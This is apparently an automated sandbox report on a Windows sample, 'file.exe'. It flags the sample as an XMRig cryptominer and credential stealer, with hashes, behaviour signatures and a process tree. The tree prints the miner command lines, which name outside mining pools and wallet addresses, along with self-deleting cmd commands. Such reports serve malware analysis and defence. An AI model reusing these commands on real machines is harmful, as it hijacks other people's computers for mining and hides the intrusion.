Overview

overview

10

Static

static

file.exe

windows7_x64

10

file.exe

windows10_x64

10

Analysis

  • max time kernel
    75s
  • max time network
    136s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-04-2021 11:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    126KB

  • MD5

    fdefd1e361d1020577bf018a5a98040c

  • SHA1

    2d7c4cfa15f4cb29ce95e7a59c3089a081a772a2

  • SHA256

    01cb6ab274dc0ac90192b537a606965d98f03d99c95b3a0e24bc6cad724d42c7

  • SHA512

    adb42dc5cc31b95f6e3d463068d57480acb50c80ce49f4fabd0fa87700dda3d92afe543f2569f2e92077afd0d00869c5cdf24902968050132eccd9a230719378

Score
10/10
xmrigdiscoveryminerpersistencespywarestealer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 4 IoCs
    miner
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:644
    • C:\Users\Admin\AppData\Roaming\AE08.tmp.exe
      "C:\Users\Admin\AppData\Roaming\AE08.tmp.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3404
      • C:\Windows\system32\msiexec.exe
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        3⤵
          PID:2956
        • C:\Windows\system32\msiexec.exe
          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
      • C:\Users\Admin\AppData\Roaming\AF03.tmp.exe
        "C:\Users\Admin\AppData\Roaming\AF03.tmp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:96
        • C:\Windows\SysWOW64\cmd.exe
          /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AF03.tmp.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4084
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 3
            4⤵
            • Delays execution with timeout.exe
            PID:3284
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2192
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:2320

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/96-22-0x0000000000400000-0x000000000587C000-memory.dmp

      Filesize

      84.5MB

      Download

    • memory/96-21-0x00000000077E0000-0x000000000CC5C000-memory.dmp

      Filesize

      84.5MB

      Download

    • memory/644-9-0x0000000003600000-0x0000000003648000-memory.dmp

      Filesize

      288KB

      Download

    • memory/644-2-0x00000000009C0000-0x00000000009CD000-memory.dmp

      Filesize

      52KB

      Download

    • memory/2956-12-0x0000000140000000-0x0000000140383000-memory.dmp

      Filesize

      3.5MB

      Download

    • memory/2956-10-0x0000000140000000-0x0000000140383000-memory.dmp

      Filesize

      3.5MB

      Download

    • memory/3472-18-0x000002695B400000-0x000002695B420000-memory.dmp

      Filesize

      128KB

      Download

    • memory/3472-17-0x0000000140000000-0x000000014070A000-memory.dmp

      Filesize

      7.0MB

      Download

    • memory/3472-16-0x0000000140000000-0x000000014070A000-memory.dmp

      Filesize

      7.0MB

      Download

    • memory/3472-15-0x000002695B3C0000-0x000002695B3D4000-memory.dmp

      Filesize

      80KB

      Download

    • memory/3472-13-0x0000000140000000-0x000000014070A000-memory.dmp

      Filesize

      7.0MB

      Download

    • memory/3472-25-0x000002695B520000-0x000002695B540000-memory.dmp

      Filesize

      128KB

      Download